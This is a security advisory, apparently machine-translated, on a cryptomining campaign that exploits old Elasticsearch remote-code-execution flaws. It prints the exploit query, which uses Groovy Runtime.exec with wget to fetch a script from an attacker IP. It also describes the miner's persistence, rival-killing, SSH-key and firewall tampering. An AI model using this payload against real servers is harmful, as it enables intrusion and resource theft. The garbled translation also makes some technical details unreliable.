Crypto currency mining machine using Elasticsearch vulnerability propagation-vulnerability warning-the black bar safety net

ElasticSearch is based on Lucene search server. It provides a distributed multi-user capability of the full-text search engine, based on the RESTful web interface. Elasticsearch is developed in Java, and as the Apache license under the terms of the open source release, is the current popular enterprise search engine. To be able to achieve real-time search, stable, reliable, fast to install and easy to use.
Researchers at containing the Elasticsearch search engine honeypot system detected the mining activities. Mining attacks exploit the known CVE-2015-1427 and CVE-2014-3120 vulnerability. CVE-2015-1427 is the Groovy script engine vulnerability, allowing a remote attacker by constructing a script to remotely execute arbitrary shell commands. CVE-2014-3120 is Elasticsearch’s default configuration vulnerability. Currently Elasticsearch no longer support a vulnerable version.
The researchers in the running Elasticsearch server running on the following query command:
“{“lupin”:{“script”: “java. lang. Math. class. forName(”java. lang. Runtime”). getRuntime(). exec(”wget hxxp://69[.] 30[.] 203[.] 170/gLmwDU86r9pM3rXf/update.sh -P
/tmp/sssooo”). getText()”}}}”
The same to attack the system and attack the host also utilizes the same command, the command can also save the payload in. The IP is resolved to the corresponding domain name for matrixhazel[.] com, up to now, the IP has been unable to access.
!
Figure 1. GreyNoise the host is marked as a known scanner
挖矿机首先调用shell和运行下载的命令传播bash脚本update.sh that the output of the command is set to/tmp/sssooo file. Use the/tmp file is because in most systems the default limit is relatively small.
The attack is very simple, the victim will bring a significant impact. Once the attacker gets to run any command ability, you can attempt to privilege elevation, even turning to other systems to invasion of the entire network.
Although the method of attack is about the same, but the payload may be different. For example, the researchers analyze the samples, payload就是update.sh the. After running the update. sh script will download two files: devtools and config. json. The script will then apply the crypto-currency mining machine.
Mining machine ELF64 binaries is actually the devtools, to help better disguise the mining machine, because devtools is on GitHub common of a tool. Mining machine using the configuration in the config. the json file.
!
Figure 2. config. the json configuration file
This program before can also be malicious software is widely used, but the package script has many other interesting functions. Code style and the hack tool is very similar to that part of the code also appears in the Xbash associated malware.

Crypto currency mining machine application
Mining machine containing three files, you can bash the wget, curl or url command download:
!
Figure 3. wget, curl, the url command
Mining machine can be downloaded the following:
Devtools – real mining machine
Update.sh – used to download other portion of the bash script
Config. json – mining machine configuration file
First, the malicious software will try to save these files in/etc/, and if that fails, then it tries to save in/tmp directory. The researchers found in the analysis of samples stored in/tmp to be successful. After, check the machine whether there are other mining activities. It is assumed that the device has been attacked, and attempts from an attacker to hijack the machine. This process may be used to update the mining machine to the updated version.
!
Figure 4. The sample allows the mining machine to clear the other has a mining machine of the command
If detected in the system, other mining machines, running the mining machine associated with other processes will be killed. Will also reset the crontab, so that cron will not open other mining machine.
!
!
Figure 5. System, the other is to kill the mining machine process
And then mining the opportunity to put their own added to the crontab, and every 10 minutes run time. Each run will use chattr-i the first to unlock themselves, and update their file, and finally use chattr +i to protect the file to prevent the file from being a low-Rights user to modify or delete. Mining machine will also clear the history to prevent being tracked, such as shown in Figure 8. Among the interesting point is that when the script is in the root directory of the runtime, the script will try to move their SSH key added to authorized_keys, so that you can no password to login. But the command sequence there are problems, leading to the key just added to the authorized_keys will be removed.
!
Figure 6. Mining machine, other function: components protection, crontab completed reside, network traffic encryption
!
Figure 7. Mining machine modify your system’s iptables/firewall

[1] [2] next